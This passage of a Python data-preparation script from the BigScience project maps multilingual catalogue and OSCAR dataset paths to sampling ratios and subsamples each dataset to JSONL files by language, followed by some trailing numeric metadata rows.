"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_wikivoyage_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_213_www_hola_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_324_gestion_pe": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_28_www_fayerwayer_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-sw_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_354_www_lagaceta_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_534_www_nairaland_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_253_www_debate_com_mx": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_248_www_telesurtv_net": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_406_www_americaeconomia_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_130_www_elperiodicomediterraneo_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_232_tn_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_leipzig_wortschatz_urdu_newscrawl_2016_sentences": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_71_www_rtve_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_220_www_vanguardia_com_mx": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_pseudocrawl-filtered_549_www_cnnindonesia_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_project_gutenberg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_vietai_sat": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_tecla": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_203_www_que_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_320_www_paginasiete_bo": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_181_noticiassin_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_the_pile_europarl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_675_www_elespectador_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_146_www_perfil_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_the_pile_europarl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_the_pile_europarl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_brad_2": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_79_www_laopiniondemurcia_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_229_www_expansion_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-kn_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_299_www_lne_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_263_www_lasexta_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_the_pile_europarl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_136_valenciaplaza_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_256_www_laprovincia_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_373_www_farodevigo_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_royal_society_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_245_www_noticiasdenavarra_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_pseudocrawl-filtered_515_www_aajtak_in": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-kn_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_58_www_levante_emv_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_198_www_eleconomista_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_249_www_telecinco_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_288_www_marca_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_ksucca": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_189_www_eleconomista_com_mx": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_scielo": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_103_www_elmostrador_cl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_leipzig_wortschatz_urdu-pk_web_2019_sentences": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_211_www_elcomercio_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_sanad": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_429_cadenaser_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_267_www_elperiodico_com_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_pseudocrawl-filtered_595_mawdoo3_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_215_www_lainformacion_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh-tw_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh-cn_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_255_elcomercio_pe": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indonesian_news_articles_2017": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_409_www_proceso_com_mx": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_510_timesofindia_indiatimes_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_349_www_eltiempo_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_424_www_lavanguardia_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_100_www_aporrea_org": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_vinbigdata_monolingual_vlsp_2020": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_bsbasque": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_497_www_straitstimes_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_396_www_eldiario_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_tashkeela": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_du_reader": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_20_www_clarin_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_689_www_abc_net_au": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_pseudocrawl-filtered_667_www_bhaskar_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_63_www_lanacion_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-kn_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_333_www_elmundo_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_project_gutenberg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_pseudocrawl-filtered_550_www_lemonde_fr": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_multi_un_2": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_uncorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_multi_un_2": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_catalan_general_crawling": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_multi_un_2": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ne_unsupervised_cross_lingual_representation_learning_at_scale": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_multi_un_2": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_multi_un_2": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_iitb_english_hindi_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_uncorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_uncorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_no_code_stackexchange": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_uncorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_uncorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_indic_nlp_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_binhvq_news_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_catalan_textual_corpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_bangla_lm": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_openiti_proc": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_arabic_billion_words": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_brwac": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_project_gutenberg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_the_pile_uspto": 0.5441176470588235, # ((350 [expected] - ( 326 [catalogue_en] - 251 [s2orc] - 21 [uspto]) ) * 1/2 [catalogue_en_proportion]) / (251 [s2orc] + 21 [uspto])
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_code_stackexchange": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_hal_archives_ouvertes": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_code_github-no-gpl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_wudaocorpora": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_s2orc_ai2_pdf_parses": 0.5441176470588235, # ((350 [expected] - ( 326 [catalogue_en] - 251 [s2orc] - 21 [uspto]) ) * 1/2 [catalogue_en_proportion]) / (251 [s2orc] + 21 [uspto])
}
OSCAR_DATASETS = {
# oscar
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/ar": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/bn": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/ca": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/en": 0.13454545454545455, # ((350 [expected] - ( 326 [catalogue_en] - 251 [s2orc] - 21 [uspto]) ) * 1/2 [oscar_en proportion] ) / 1_100 [oscar_en]
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/es": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/eu": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/fr": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/hi": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/id": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/pt": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/ur": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/vi": 1,
"/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/zh": 1
}
assert set(OSCAR_DATASETS.keys()).isdisjoint(set(CATALOGUE_DATASETS.keys()))
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"--dataset-path", choices=list(set(CATALOGUE_DATASETS.keys()) | set(OSCAR_DATASETS.keys())), type=str, required=True,
help="Dataset path."
)
parser.add_argument(
"--save-jsonl-dataset-path-prefix", type=Path, required=True,
help="Where to output json file. Files will be save in `{args.save_jsonl_dataset_path_prefix}/{lang}/{dataset_name}"
)
parser.add_argument(
"--num-proc", type=int, default=1
)
parser.add_argument(
"--batch-size", type=int
)
return parser.parse_args()
catalogue_language_regex = re.compile(
r"^/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_([^_]+)_.*$"
)
normalise_catalogue_dataset_name_regex = re.compile(
r"^/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/(.*)$"
)
def get_catalogue_language(dataset_name: str) -> str:
lang_candidate = catalogue_language_regex.match(dataset_name).group(1)
# Normalise chinese languages, so that we only consider simplified and traditional chinese as the two chinese languages
if lang_candidate in ["zh", "zhs", "zh-cn"]:
lang_candidate = "zhs"
elif lang_candidate in ["zht", "zh-tw"]:
lang_candidate = "zht"
else:
assert lang_candidate[:2] != "zh"
return lang_candidate
oscar_to_bs_language = {
"ar": "ar",
"bn": "indic-bn",
"ca": "ca",
"en": "en",
"es": "es",
"eu": "eu",
"fr": "fr",
"hi": "indic-hi",
"id": "id",
"pt": "pt",
"ur": "indic-ur",
"vi": "vi",
"zh": "zhs"
}
oscar_language_regex = re.compile(
r"^/gpfsscratch/rech/six/commun/bigscience-datasets/oscar_dedup/(.*)$"
)
def get_oscar_language(dataset_name: str) -> str:
return oscar_to_bs_language[oscar_language_regex.match(dataset_name).group(1)]
def sample_dataset(dataset: Dataset, ratio: float) -> Dataset:
logger.info(f"Ratio: {ratio}")
if ratio >= 1:
return dataset
num_samples = int(len(dataset) * ratio)
indices = rng.choice(len(dataset), size=num_samples, replace=False, shuffle=False)
return dataset.select(indices)
def main():
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
)
args = get_args()
logger.info(f"** The job is runned with the following arguments: **\n{args}\n **** ")
# Compute save path
save_path: Path
if args.dataset_path in CATALOGUE_DATASETS:
lang = get_catalogue_language(args.dataset_path)
filename = f"{normalise_catalogue_dataset_name_regex.match(args.dataset_path).group(1)}.jsonl"
save_path = Path(args.save_jsonl_dataset_path_prefix) / lang / filename
elif args.dataset_path in OSCAR_DATASETS:
lang = get_oscar_language(args.dataset_path)
save_path = Path(args.save_jsonl_dataset_path_prefix) / lang / f"lm_{lang}_oscar.jsonl"
else:
raise NotImplementedError
# Saved dataset don't require us to re-run de pipeline
if save_path.exists():
logger.info(f"{save_path} already exists. Exiting early.")
return
# load_dataset
logger.info(f"Loading {args.dataset_path}")
if args.dataset_path in CATALOGUE_DATASETS:
ds = load_from_disk(Path(args.dataset_path) / "final")
elif args.dataset_path in OSCAR_DATASETS:
ds = load_from_disk(args.dataset_path)
else:
raise NotImplementedError
# remove all columns except text
logger.info(f"Removing all columns except `text`")
columns_to_remove = set(ds.column_names)
columns_to_remove.remove("text")
ds = ds.remove_columns(list(columns_to_remove))
# sample dataset according to ratio
logger.info(f"Sampling dataset according to given ratio")
if args.dataset_path in CATALOGUE_DATASETS:
ds = sample_dataset(ds, CATALOGUE_DATASETS[args.dataset_path])
elif args.dataset_path in OSCAR_DATASETS:
ds = sample_dataset(ds, OSCAR_DATASETS[args.dataset_path])
else:
raise NotImplementedError
# save to json
logger.info(f"Saving to {save_path}")
tmp_save_path = Path(save_path.parent, f"tmp-{save_path.name}")
tmp_save_path.parent.mkdir(parents=True, exist_ok=True)
ds.to_json(
tmp_save_path,
num_proc=args.num_proc,
batch_size=args.batch_size
)
tmp_save_path.rename(save_path)
if __name__ == "__main__":
main()
| 114.023041
| 284
| 0.812459
| 10,305
| 74,229
| 5.607666
| 0.06657
| 0.130047
| 0.156056
| 0.208074
| 0.908474
| 0.905134
| 0.903646
| 0.901258
| 0.89572
| 0.885632
| 0
| 0.023083
| 0.053955
| 74,229
| 650
| 285
| 114.198462
| 0.799812
| 0.008999
| 0
| 0.027331
| 0
| 0.782958
| 0.867966
| 0.860501
| 0
| 0
| 0
| 0
| 0.003215
